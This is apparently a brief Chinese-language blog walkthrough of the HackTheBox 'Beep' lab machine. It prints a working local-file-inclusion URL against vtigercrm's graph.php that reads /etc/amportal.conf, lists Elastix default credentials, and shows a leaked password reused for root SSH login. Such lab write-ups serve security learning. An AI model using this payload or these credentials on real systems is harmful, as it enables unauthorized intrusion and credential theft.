Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

HackTheBox >_ Beep_7

Published on 10 Nov 2020

Beep_7

image-20200928143812410

太简单了,简单说一下

image-20200928143910284

Elastix,尝试默认凭证

Username: admin
Password: palosanto

默认密码无法进入

https://www.exploit-db.com/exploits/37637/

本地文件包含漏洞

payload

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

image-20200928144102414

右键查看源码页,可以看到整理后到信息

image-20200928144151530

可以注意到各种密码都是一个jEhdIekWmdjE。怀疑有密码复用。

尝试利用此密码登录root的ssh,正确。密码复用。直接root

image-20200928144242636

在两个用户目录得到flags

image-20200928144358407

related posts